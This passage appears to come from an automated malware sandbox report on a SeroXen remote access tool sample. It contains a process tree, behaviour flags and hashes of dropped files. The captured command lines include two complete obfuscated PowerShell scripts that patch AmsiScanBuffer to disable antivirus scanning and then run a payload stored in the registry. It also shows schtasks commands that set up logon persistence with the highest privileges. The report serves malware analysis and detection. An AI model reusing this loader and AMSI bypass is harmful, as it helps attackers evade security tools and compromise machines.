$_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+''+'t'+''+'e'+''+[Char](109)+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType('Mi'+[Char](99)+'ros'+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+''+'s'+''+[Char](97)+'feNat'+'i'+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+'t'+[Char](104)+'o'+[Char](100)+''+[Char](115)+'');$rpEoIhvmDJDEGP=$jXBROHGhPwuix.GetMethod('GetPr'+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+'i'+'c,'+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$jUnCOvUIteepFyvFNFi=DeaEIfQEBMCB @([String])([IntPtr]);$DiFwPxJDDRCzpJfggJinxY=DeaEIfQEBMCB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$owlguydTCru=$jXBROHGhPwuix.GetMethod(''+[Char](71)+''+'e'+'t'+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'r'+[Char](110)+'e'+'l'+''+'3'+''+[Char](50)+'.'+[Char](100)+''+[Char](108)+'l')));$WdyWdWQrEChpGw=$rpEoIhvmDJDEGP.Invoke($Null,@([Object]$owlguydTCru,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+[Char](76)+'i'+[Char](98)+'ra'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$opntHywwLJLMvIysj=$rpEoIhvmDJDEGP.Invoke($Null,@([Object]$owlguydTCru,[Object](''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$hRrGnAy=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WdyWdWQrEChpGw,$jUnCOvUIteepFyvFNFi).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+'i'+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'');$TUvwnAXLmgFYXiPaO=$rpEoIhvmDJDEGP.Invoke($Null,@([Object]$hRrGnAy,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+'i'+''+'S'+'c'+[Char](97)+''+'n'+''+[Char](66)+''+'u'+''+[Char](102)+'f'+'e'+'r')));$UGMEzjOiCu=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($opntHywwLJLMvIysj,$DiFwPxJDDRCzpJfggJinxY).Invoke($TUvwnAXLmgFYXiPaO,[uint32]8,4,[ref]$UGMEzjOiCu);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$TUvwnAXLmgFYXiPaO,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($opntHywwLJLMvIysj,$DiFwPxJDDRCzpJfggJinxY).Invoke($TUvwnAXLmgFYXiPaO,[uint32]8,0x20,[ref]$UGMEzjOiCu);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OFT'+[Char](87)+''+'A'+''+[Char](82)+'E').GetValue('$'+[Char](55)+''+'7'+'s'+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4748
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bwixibWRwxCy{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ArNVYsvJjSYcLe,[Parameter(Position=1)][Type]$DKZOpOScOV)$PWyHDJOQmCy=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+'le'+[Char](103)+''+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+'M'+'e'+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+'u'+'l'+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+'l'+'a'+[Char](115)+''+[Char](115)+''+','+''+[Char](80)+'ubli'+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+'ed'+','+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+'a'+'s'+''+'s'+',A'+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+'l'+[Char](97)+''+'s'+'s',[MulticastDelegate]);$PWyHDJOQmCy.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+''+'e'+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+'m'+'e'+''+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+'i'+'g'+','+''+[Char](80)+''+'u'+'b'+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$ArNVYsvJjSYcLe).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+'ge'+'d'+'');$PWyHDJOQmCy.DefineMethod('I'+'n'+'v'+'o'+'ke',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c'+[Char](44)+'Hi'+[Char](100)+''+'e'+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'N'+[Char](101)+'w'+[Char](83)+'l'+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+''+'r'+'tu'+[Char](97)+''+'l'+'',$DKZOpOScOV,$ArNVYsvJjSYcLe).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+'m'+''+[Char](101)+','+'M'+''+'a'+'nag'+[Char](101)+''+'d'+'');Write-Output $PWyHDJOQmCy.CreateType();}$RDrXZJfpagtvH=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'te'+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+'l'+'')}).GetType(''+'M'+'i'+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+'2'+'.'+[Char](85)+''+'n'+'s'+[Char](97)+''+[Char](102)+''+'e'+''+'N'+'a'+'t'+''+'i'+'ve'+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$QJHxfATQdLDLnm=$RDrXZJfpagtvH.GetMethod('Ge'+'t'+''+[Char](80)+''+[Char](114)+''+'o'+'cAdd'+[Char](114)+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+'u'+'b'+'li'+'c'+''+','+''+'S'+''+[Char](116)+''+[Char](97)+''+[Char](116)+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HDMemNGoTPFreoNQofQ=bwixibWRwxCy @([String])([IntPtr]);$vERXldaKeyianPvenrbBxq=bwixibWRwxCy @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$fDfsvkMKbBR=$RDrXZJfpagtvH.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+''+'o'+''+[Char](100)+'u'+'l'+''+'e'+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+[Char](110)+''+'e'+'l32'+[Char](46)+'d'+'l'+''+'l'+'')));$JAMilvPyxoyKdO=$QJHxfATQdLDLnm.Invoke($Null,@([Object]$fDfsvkMKbBR,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+[Char](105)+''+'b'+''+[Char](114)+''+[Char](97)+''+'r'+''+'y'+''+'A'+'')));$IFLUHSDcddnxeFHOY=$QJHxfATQdLDLnm.Invoke($Null,@([Object]$fDfsvkMKbBR,[Object](''+'V'+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+'t'+'')));$oJsodyR=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JAMilvPyxoyKdO,$HDMemNGoTPFreoNQofQ).Invoke(''+[Char](97)+'m'+[Char](115)+'i'+'.'+''+[Char](100)+''+[Char](108)+'l');$bYdTeSUqjdiqtNqiF=$QJHxfATQdLDLnm.Invoke($Null,@([Object]$oJsodyR,[Object](''+'A'+'m'+'s'+''+'i'+'S'+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+'u'+'f'+''+[Char](102)+''+[Char](101)+'r')));$TnnKEwCawb=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IFLUHSDcddnxeFHOY,$vERXldaKeyianPvenrbBxq).Invoke($bYdTeSUqjdiqtNqiF,[uint32]8,4,[ref]$TnnKEwCawb);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$bYdTeSUqjdiqtNqiF,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IFLUHSDcddnxeFHOY,$vERXldaKeyianPvenrbBxq).Invoke($bYdTeSUqjdiqtNqiF,[uint32]8,0x20,[ref]$TnnKEwCawb);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+'A'+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+''+'s'+''+[Char](116)+''+[Char](97)+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:72 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5024
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1172
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1208
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1268
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1344
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1456
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1524
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1540
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:1084
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1696
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1764
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1772
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1872
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
- Modifies Internet Explorer settings
PID:1892 -
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004D4 0x00000000000004E42⤵PID:3740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1976
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1796
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2052
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2136
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2432
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2484
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2560
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2576
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2592
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2636
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2692
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:724
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of UnmapMainImage
PID:3344 -
C:\Users\Admin\AppData\Local\Temp\Uni.exe"C:\Users\Admin\AppData\Local\Temp\Uni.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3492 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:4536 -
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:3452 -
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"4⤵
- Executes dropped EXE
PID:4016 -
C:\Users\Admin\AppData\Local\Temp\YLyLEEe0GcIq.exe"C:\Users\Admin\AppData\Local\Temp\YLyLEEe0GcIq.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4464 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 18165⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2720 -
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"3⤵
- Executes dropped EXE
PID:4596 -
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:1016
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3532
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:3892
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3972
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4004
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:3524
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4372
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:2512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:1200
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2568
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:1592
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2300
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:2068
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3484
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3828
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4744
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1712
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2788
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:1364
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:1780 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4464 -ip 44642⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2044
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
13KB
MD5c50487d848c0f12ce6ffce0cf620d9c7
SHA1349c24cb7022332b6e2abf5d2c9ee22808719990
SHA2569eeec6de6f4b3b5079bb1a2d3e2123a209cc758d09cfa024ca913e0690501701
SHA5129aada8fce2a9e1b512840d89440c05dd4f060db58a938188ea13286002d86ccf548fc9db92b591379e19656f91eca1d216db69709a832d45cbd5727e7132d808
-
Filesize
34KB
MD57801b700351217dcc4d7cb92caa4e8a7
SHA1bf203103c5bb5e6c4387cefa779f0c971393de3a
SHA2568b8d2100ca0b624fddae0abb2288e83b00ce033c24d16283b89a918e7d5fb97f
SHA512ee7564ed0e06da8d445c8e386c3d04c69b915faf7b18dcff0e92853c0364be8a45f45c73dd5555c7bfbf1bcc75b00980267379dda0a6e24ec9304ef0595edbc8
-
Filesize
276KB
MD5120f3a38b2f4eb0f800ebe47ffa5e76b
SHA1bed5148cc6a53e12a86ed635bb79135a568edd78
SHA2563a195d762fd1e2f7f93eb4cbcef8fa9b600a6f94fc43b1c1c157b2c5e069154f
SHA51260e66274203624afa422578d9807b21cbcc99de855dd665aa54753c957886677e358a2579ade098970c7ea3f9c3f2476c9e028fdabaac6ee991f09093fa52aff
-
Filesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
Filesize
409KB
MD516e4226eddebe2148b46353c351ec570
SHA15879aab64c4d4c086f24807f85c3f1bec657db9c
SHA25604f86ef6a2870bcaff958187d1bbf7281e6c8c1c1f2fbefddc11e3a379e4f9b9
SHA5127fa89b0aee061fca53534c7e38dfa873235095e32f64e87d7a8457e765f804d8f2408e90b90a484ea3e9c18d1110a5667de9aab14d9d9e22911433e9da4cfd38
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e